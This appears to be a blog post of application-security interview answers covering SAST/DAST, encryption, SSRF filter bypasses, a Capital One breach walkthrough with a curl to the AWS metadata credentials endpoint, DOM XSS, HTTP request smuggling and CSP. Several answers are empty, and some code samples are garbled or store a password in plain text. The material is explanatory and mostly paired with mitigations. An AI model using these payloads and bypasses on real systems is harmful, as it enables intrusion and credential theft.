Commonly asked Application Security interview questions - Part 2

SAST vs DAST:

SAST:

  • White box security testing

    • The tester has access to the underlying framework, design, and implementation. The application is tested from the inside out. This type of testing represents the developer approach.

  • Requires source code

    • SAST doesn’t require a deployed application. It analyzes the sources code or binary without executing the application.

  • Finds vulnerabilities earlier in the SDLC

    • The scan can be executed as soon as the code is deemed feature-complete.

  • Less expensive to fix vulnerabilities

    • Since vulnerabilities are found earlier in the SDLC, it’s easier and faster to remediate them. Findings can often be fixed before the code enters the QA cycle.

  • Can’t discover run-time and environment-related issues

    • Since the tool scans static code, it can’t discover run-time vulnerabilities.

DAST:

  • Black box security testing

    • The tester has no knowledge of the technologies or frameworks that the application is built on. The application is tested from the outside in. This type of testing represents the hacker approach.

  • Requires a running application

    • DAST doesn’t require source code or binaries. It analyzes by executing the application.

  • Finds vulnerabilities toward the end of the SDLC

    • Vulnerabilities can be discovered after the development cycle is complete.

  • More expensive to fix vulnerabilities

    • Since vulnerabilities are found toward the end of the SDLC, remediation often gets pushed into the next cycle. Critical vulnerabilities may be fixed as an emergency release.

  • Can discover run-time and environment-related issues

    • Since the tool uses dynamic analysis on an application, it is able to find run-time vulnerabilities.

  • Typically scans only apps like web applications and web services

    • DAST is not useful for other types of software.

Symmetric and Asymmetric Encryption:

Symmetric Encryption:

Symmetric encryption is a widely used data encryption technique whereby data is encrypted and decrypted using a single, secret cryptographic key. Specifically, the key is used to encrypt plaintext - the data’s pre-encryption or post-decryption state - and decrypt ciphertext - the data’s post-encryption or pre-decryption state.

Symmetric encryption is one of the most widely used encryption techniques and also one of the oldest, dating back to the days of the Roman Empire. Caesar’s cipher, named after none other than Julius Caesar, who used it to encrypt his military correspondence, is a famous historical example of symmetric encryption in action.

The goal of symmetric encryption is to secure sensitive, secret, or classified information. It’s used daily in many major industries, including defence, aerospace, banking, health care, and other industries in which securing a person’s, business’, or organization’s sensitive data is of the utmost importance.

Popular examples of symmetric encryption include the:

  • Data Encryption Standard (DES)

  • Triple Data Encryption Standard (Triple DES)

  • Advanced Encryption Standard (AES)

  • International Data Encryption Algorithm (IDEA)

  • TLS/SSL protocol

Some advantages of symmetric encryption include:

  • Security: symmetric encryption algorithms like AES take billions of years to crack using brute-force attacks.

  • Speed: symmetric encryption, because of its shorter key lengths and relative simplicity compared to asymmetric encryption, is much faster to execute.

  • Industry adoption and acceptance: symmetric encryption algorithms like AES have become the gold standard of data encryption because of their security and speed benefits, and as such, have enjoyed decades of industry adoption and acceptance.

Asymmetric Encryption:

Unlike symmetric encryption, which uses the same secret key to encrypt and decrypt sensitive information, asymmetric encryption, also known as public-key cryptography or public-key encryption, uses mathematically linked public- and private-key pairs to encrypt and decrypt senders’ and recipients’ sensitive data.

As with symmetric encryption, the plaintext is still converted into ciphertext and vice versa during encryption and decryption, respectively. The main difference is that two unique key pairs are used to encrypt data asymmetrically.

Examples of asymmetric encryption include:

  • Rivest Shamir Adleman (RSA)

  • the Digital Signature Standard (DSS), which incorporates the Digital Signature Algorithm (DSA)

  • Elliptical Curve Cryptography (ECC)

  • the Diffie-Hellman exchange method

  • TLS/SSL protocol

Advantages of using asymmetric encryption include:

  • Key distribution is not necessary: securing key distribution channels has long been a headache in cryptography. Asymmetric encryption eliminates key distribution entirely. The needed public keys are exchanged through public-key servers, and the disclosure of public keys is not, at this time, detrimental to the security of encrypted messages, because they cannot be used to derive private keys.

  • Exchange of private keys is not necessary: with asymmetric encryption, private keys should remain stored in a secure location and thus private to the entities using them. Basically, the keys needed to decrypt sensitive information are never, and should not ever be, exchanged over a potentially compromised communication channel, and that’s a major plus for the security and integrity of encrypted messages.

  • Digital signature/message authentication: with asymmetric encryption, senders can use their private keys to digitally sign and verify that a message or file originated from them and not an untrusted third party.

Exploiting SSRF attacks

Editing API calls to access back-end server through the API, as direct access might be restricted to authenticated users:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=**<http://192.168.0.68/admin**>     

Circumventing common SSRF defences

It is common to see applications containing SSRF behaviour together with defences aimed at preventing malicious exploitation. Often, these defences can be circumvented.

SSRF with blacklist-based input filters

Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using various techniques:

  • Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1.

  • Registering your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose.

  • Obfuscating blocked strings using URL encoding or case variation.

  • Capital One breach in 2019

  • The attacker gained access to a set of AWS access keys by accessing the AWS EC2 metadata service via a SSRF vulnerability.

  • The attacker seems to have accessed the AWS credentials for a role called ISRM-WAF-Role via the endpoint http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role using the SSRF bug.

ubuntu@ip-xxx-xx-xx-x:~$ curl <http://169.000.000.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role>
{
  "Code" : "Success",
  "LastUpdated" : "2019-08-03T20:42:03Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA5A6IYGGDLBWIFH5UQ",
  "SecretAccessKey" : "sMX7//Ni2tu2hJua/fOXGfrapiq9PbyakBcJunpyR",
  "Token" : "AgoJb3JpZ2luX2VjEH0aCXVzLWVhc3QUCIQDFoFMUFs+lth0JM2lEddR/8LRHwdB4HiT1MBpEg8d+EAIgCKqMjkjdET/XjgYGDf9/eoNh1+5Xo/tnmDXeDE+3eKIq4wMI9v//////////ARAAGgw4OTUzODQ4MTU4MzAiDEF3/SQw0vAVzHKrgCq3A84uZvhGAswagrFjgrWAvIj4cJd6eI5Gcje09FyfRPmALKJymfQgpTQN9TtC/sBhIyICfni8JJvGesQZGi9c0ZFIWqdlmM
  • Very likely the next step the attacker took was to add the discovered credentials to their local AWS CLI using the aws configure command. A key difference to the credentials when obtained for an IAM User using IAM and a role when accessed through the metadata instance is the presence of a token. This token cannot be added using the aws configure command directly but needs to be added to the environment variable or the ~/.aws/credentials file as aws_session_tokenusing a text editor.

An example ~/.aws/credentials file with an AWS CLI profile called example looks like this

aws s3 ls --profile example
  • Data storage in AWS S3 was not encrypted. This probably would not have made a lot of difference, especially since the IAM Role potentially had administrative permissions.

  • Lastly, the absence of monitoring for IAM and AWS STS API Calls with AWS CloudTrail and monitoring for S3 read (or writes) given the sensitive nature of data therein.

References:

What is web cache deception?

It works against sites that sit behind a reverse proxy (like Cloudflare) and are misconfigured in a particular way.

For example, if you're running the Django web framework, the following configuration would do just that because the regular expression ^newsfeed/ matches both newsfeed/ and newsfeed/foo (Django routes omit the leading /):

from django.conf.urls import url
patterns = [url(r'^newsfeed/', ...)]

And here's where the problem lies. If your website does this, then a request /newsfeed/foo.jpg will be treated as the same as a request to /newsfeed. But Cloudflare, seeing the .jpg file extension, will think that it's OK to cache this request.

Now, you might be thinking, "So what? My website never has any links to /newsfeed/foo.jpg or anything like that." That's true, but that doesn't stop other people from trying to convince your users to visit paths like that. For example, an attacker could send this message to somebody:

Hey, check out this cool link! https://example.com/newsfeed/foo.jpg

Mitigation:

The best way to defend against this attack is to ensure that your website isn't so permissive, and never treats requests to nonexistent paths (say, /x/y/z) as equivalent to requests to valid parent paths (say, /x). Generate a 404 if the path doesn’t exist

References:

What is DOM-based XSS?

DOM Based XSS simply means a Cross-site scripting vulnerability that appears in the DOM (Document Object Model) instead of part of the HTML. In reflective and stored Cross-site scripting attacks you can see the vulnerability payload in the response page but in DOM-based cross-site scripting, the HTML source code and the response of the attack will be exactly the same, i.e. the payload cannot be found in the response. It can only be observed on runtime or by investigating the DOM of the page.

Simple DOM Based Cross-site Scripting Vulnerability Example

Imagine the page http://www.example.com/test.html that contains the below JavaScript code:

<script>
   document.write("<b>Current URL</b> : " + document.baseURI);
</script>

If you send an HTTP request like http://www.example.com/test.html#<script>alert(1)</script>, simple enough your JavaScript code will get executed because the page is writing whatever you typed in the URL to the page with document.write function. If you look at the source of the page, you won't see <script>alert(1)</script> it because it's all happening in the DOM and done by the executed JavaScript code.

After the malicious code is executed by page, you can simply exploit this DOM-based cross-site scripting vulnerability to steal the cookies from the user's browser or change the behaviour of the page on the web application as you like.

What is HTTP request smuggling?

HTTP Request Smuggling is an attack technique that abuses the discrepancy in the parsing of non RFC compliant HTTP requests between two HTTP devices (typically a front-end proxy or HTTP-enabled firewall and a back-end web server) to smuggle a request to the second device "through" the first device. This technique enables the attacker to send one set of requests to the second device while the first device sees a different set of requests. In turn, this facilitates several possible exploitations, such as partial cache poisoning, bypassing firewall protection and XSS.

If we modify the request to include a smuggled request, we would insert both of the Content-Length and Transfer-Encoding headers, making sure that we include the smuggled request.

POST /admin HTTP/1.1 
Host: example.com 
Connection: Keep-Alive 
Content-Type: application/x-www-form-urlencoded 
Content-Length :11 
Transfer-Encoding: chunked
**7**
**POST /admin HTTP/1.1 
Host: foo.com Connection: Keep-Alive 
Content-Type: application/x-www-form-urlencoded 
Content-Length :11 Transfer-Encoding: chunked**
**q=givemezepasswords 0**

How can I detect it?

There are numerous manual tools that have been made for testing Requests Smuggling vulnerabilities, such as Burp Suite’s smuggler extension or Gwendal Le Coguic’s smuggler py.

How can you remediate it?

  • Ensure the same server software is used on both the front and back end servers so they agree which header they will use will prevent the conflicts (either Content-Length or Transfer-Encoding: chunked).

  • Some WAF providers already have built-in mitigation when they detect abnormal requests. Check with your provider if they have support for this

  • Disable reuse of back-end connections, so that each back-end request is sent over a separate network connection.

    References:

Can CSP header mitigate dom based XSS

CSP is a browser security mechanism that aims to mitigate XSS and some other attacks. It works by restricting the resources (such as scripts and images) that a page can load and restricting whether a page can be framed by other pages.

CSP works by enforcing that certain content policies are placed upon scripts, e.g. "no external scripts", or "no inline scripts". This makes XSS a whole lot harder because 99% of XSS cases involve inline scripts or references to off-site scripts. The only downside is that it pretty much forbids JavaScript entirely, and it can be very difficult to produce a JavaScript-enabled site that adheres to the CSP.

To enable CSP, you need to configure your webserver to return the Content-Security-Policy HTTP header. (Sometimes you may see mentions of the X-Content-Security-Policy header, but that's an older version and you don't need to specify it anymore.)

Content-Security-Policy: default-src 'self'; img-src *; media-src media1.com media2.com; script-src userscripts.example.com

Test it with:

Content-Security-Policy-Report-Only: policy 

Deprecated:

  • **X-WebKit-CSP (deprecated): Experimental header used in the past by Chrome and other WebKit-based browsers.**
  • **X-Content-Security-Policy (deprecated): Experimental header used in the past by browsers based on Gecko 2.**

References:

What will be your test case for file upload functionality?

  • Test the phrase upload is correctly aligned with the upload button. Verify, a window is opened once this upload button is clicked.

  • Make sure, cancel button works during the upload process.

  • Test, only the particular file types can be uploaded. For example doc or pdf, or image files like jpeg, bmp, png etc

  • Verify uploaded files cannot exceed a certain size. For example, the uploaded file cannot exceed 2 MB size.

  • Make sure, multiple file upload is working properly if the application under test (AUT) demands such a scenario.

  • Test timeout function is working properly. For Ex: upload should be cancelled automatically after, say 5 minutes.

  • Verify, the progress of the upload function is working properly.

  • Make sure the file upload process can resume, in case of a network connectivity problem. (Once the problem is rectified)

  • Test empty upload is not working.

  • Verifying multiple uploads of the same file is not allowed.

  • Make sure a new copy of the uploaded file is created to avoid overwriting.

  • Test drag and drop file options to upload is working properly besides the traditional way of uploading.

  • If AUT warrants, verify the number of files uploaded does not exceed the storage limit. Useful for cloud bases storage platforms like Dropbox.

  • Once the file is uploaded or error in uploading, proper redirection happens to a web page or part of an application.

  • WEB Shells

  • EICAR Files

  • File extensions not allowed

  • Null Byte extension concatenation is not allowed

  • References:

Explain Log Poisoning using LFI/RFI

How do you exploit XSS in a post request?

Difference: IDOR, Missing function level access control and privilege escalation

How does the BurpSuite work with HTTPS requests?

DNS over HTTPS

How to verify if a database is encrypted?

If you query the following: the encryption state column will tell you whether the database is encrypted or not.

sys. dm_database_encryption_keys.

You can query the following to see if the connections to your SQL Server is encrypted or not. If the value of encrypt_option is "TRUE" then your connection is encrypted.

**sys. dm_exec_connections dynamic management view (DMV)**

If you want a script to use credentials from the system, where will you store the credentials?

You can always use $cred=Get-Credential or enter the credentials in the script itself. In this scenario:

The Get-Credential cmdlet creates a credential object for a specified user name and password. You can use the credential object in security operations.

For example, the following script (example.txt):

open sftp://%USERNAME%:%PASSWORD%@example.com
...
can be called from this batch file (“configuration file”):
@echo off
set USERNAME=martin
set PASSWORD=mypassword
winscp.com /script=example.txt
If you want to encrypt the password within the configuration file, you can use ConvertFrom-SecureString cmdlet. Put the following code to an ad-hoc script (or an interactive PowerShell console):

What data does the shadow file contains?

What are stateless and stateful requests?

session info not stored in stateless

Previous
Previous

Fishing for a reverse shell

Next
Next

Commonly asked Application Security interview questions? Part 1